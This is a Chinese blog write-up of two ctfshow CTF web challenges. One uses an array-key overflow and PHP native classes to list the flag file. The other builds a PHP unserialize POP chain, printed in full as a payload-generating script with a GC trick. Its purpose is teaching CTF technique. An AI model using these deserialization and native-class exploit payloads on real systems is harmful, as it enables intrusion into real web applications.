ctfshow(卷王杯)

最新推荐文章于 2024-05-13 23:24:20 发布
最新推荐文章于 2024-05-13 23:24:20 发布
阅读量1.4k 收藏 2
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/127017346
版权

easyweb

 首先打开界面,just so so , 然后我们查看源码,发现了source 路径直接进去访问

<?php
error_reporting(0);
if(isset($_GET['source'])){
    highlight_file(__FILE__);
    echo "\$flag_filename = 'flag'.md5(???).'php';";
    die();
}
if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c'])){
    $c = $_POST['c'];
    $count[++$c] = 1;
    if($count[] = 1) {
        $count[++$c] = 1;
        print_r($count);
        die();
    }else{
        $a = $_POST['a'];
        $b = $_POST['b'];
        echo new $a($b);
    }
}
?>
$flag_filename = 'flag'.md5(???).'php';

首先我们看见了flag_filename,也就是flag的名字是flag开头.php结尾

然后进行php简单的代码审计

我们的突破口就是 else中的echo new $a($b);

首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))

需要post 传参,a,b,c都存在

这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有++$c,也就是说我们设置c为int可设置的最大值减1,等它自增后就可以达到溢出无法赋值的效果

,只需要令c = 9223372036854775806自增一次溢出就可以了。

   echo new $a($b);然后这里应该就是一个原生类rce的题目了。

DirectoryIterator: DirectoryIterator类提供了一个查看文件系统目录内容的简单接口。 FilesystemIterator: 文件系统迭代器。
GlobIterator: 与glob()类似的方式迭代文件系统。

进行&a=DirectoryIterator&b=glob://flag[a-z0-9]*.php,为了达到获取flag文件名字的操作

然后继续利用原生类获取flag

 获得flag

easy unserialize

<?php
/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */
include("./HappyYear.php");

class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}

老规矩安装习惯,先找链尾也就是最后执行输出flag的函数

 public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }看到输出flag,也就是one类中的 MeMeMe这个方法,然后往前推

 看了一下,没有直接调用方法显示在代码中的,所以我们需要从开头入手深度分析

public function __destruct() {
        @$this->object->add();
    }从one类下的魔术方法开头,这我看了一下所有的类没有add这个方法,看到有call方法,调用了不存在的方法,触发call魔术方法

 public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }second类中的call 方法,这个call_user_func比较陌生,讲解一下

如果是数组的话,第一个是类,第二个是方法,第三个是属性

  call_user_func([$this, $func."Me"], $args);调用当前的类,func是传入的addl链接Me

就是调用addMe方法,因为之中是用.作为了字符串链接,所以会调用 Tostring魔术方法

public function __toString() {
        return $this->object->string;
    }当前的类中没有string属性,则调用get魔术方法

public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    } 这里的name就是上面的string传进来的,但是   $var = $this->$name;  name前面有一个$

,$name="string",所以最后$var = $this->string

所以最后其实就是$this->string['string']();我们的目的就是让这个东西可以指向one::MeMeMe()最后就大功告成了。

$string = array("string"=>[new one(),"MeMeMe"]);即可以绕过

array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字

<?php
class one {
    public $object;
    public $year_parm=array(0=>"Happy_func");
}


class second {
    public $filename;
}


class third {
    private $string;


    public function __construct($string) {
        $this->string = $string;
    }
}


$a=new one();
$a->object=new second();
$a->object->filename=new one();
$a->object->filename->object=new third(['string'=>[new one(),'MeMeMe']]);

$n=null;
$payload=array($a,$n);

echo urlencode(serialize($payload));

      throw new Exception("高一新生报道");然后源代码这是GC回收机制

不可见的字符是%00,把最后的1改为0即可 

GC回收机制详解,浅谈PHP中GC回收机制的利用_errorr0的博客-CSDN博客

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3853
ctfshow 每周大挑战 极限命令执行 wp
CTFshow 1-10关
weixin_62369433的博客
11-11 2133
CTFshow 1-10 通关详解
最新CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web,2024年最新看这篇文章就行了
最新发布
2401_84264244的博客
05-13 886
index.phps。
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1830
ctfshow pwn入门-前置基础pwn13-pwn19
CTFShow-MISC入门篇详细wp(1-56)
热门推荐
Aluxian_的博客
07-19 1万+
cffshow-misc 入门 wp解析
ctfshow-MISC入门-图片篇(文件结构)24-40
Wkc_03的博客
05-27 1660
一般的图片藏flag都会将flag藏在图片下面,如果图片是png,只需要将高度修改即可,然而此题给的是bmp文件,像素信息直接就是在图片的hex中,所以存在将flag藏在图片上面的可能。发现030editor有模板,这个实在是好用,像这次不太清楚gif的图片格式,也可以通过其标注的颜色区分,再根据鼠标移动位置提供的提示,找到高度调整的位置。调整高度后,显示出flag,但是由于gif动图,删的太快,没有看到,用lsp看即可。没有遇到过的题型,看了一下wp,是需要取帧,利用不同帧之间的间隔时间来隐写的。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3452
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshow—反序列化
cosmoslin的博客
11-15 2067
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
php isset用法,php中empty和isset的用法
weixin_42676824的博客
03-12 380
今天在编写登入程序的时候,写了如下的代码if (isset($_POST['username']) && isset($_POST['password'])){一看大致就会明白我这段代码的想干嘛的,就是想说将检测从login.php界面传递过来的用户名和密码,如果不为空,就执行下面的代码。你是不是也是这么认为的,如果你这么认为的话,恭喜你,你打错特错了!你试试看下面的代码:$var...
ctfshow web系列
RealIiikun的博客
04-07 940
源代码要求v1为为字母,v2为数字,并且v1与v2的md5值相同md5漏洞介绍:PHP在处理字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。常见的0e开头的MD5和原值QNKCDZO240610708。
ISCTF
zhhhb1005的博客
11-09 600
shift + f12/view - 查看查找字符串得到flag。
php中关于一些$a($b)
qq_63928796的博客
11-10 1477
上一篇总结了一些ctf常用的原生类,这一篇看一下原生类的利用,大都是new $a($b)类型。
CTFSHOW 代码审计篇
羽的博客
12-19 4333
文章目录web301web302web303web304web305web306web307web308web309web310 web301 下载下来源码,发现checklogin.php里面的sql语句没有任何的过滤。 所以直接注入就可以了。用sqlmap跑了下得到用户名密码 admin ctfshowwwww登陆进去就有flag python sqlmap.py -u http://e62c174a-c4d4-4a58-a392-a41bfca926ee.chall.ctf.show/checkl
2024年网络安全最新ctfshow杯——easy unserialize_卷杯 easy unseriliz
2401_84281738的博客
05-01 23
__toString():$this->object->string -> 读取不可访问属性触发get()this->object->add() ->调用一个不存在的方法触发call()this, $func.“Me”], $args) ->调用addMe()throw new Exception(“高一新生报道”);this->filename ->触发toString()name]() ->调用one:MeMeMe()
ctfshow菜狗杯web
09-07
ctfshow菜狗杯web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值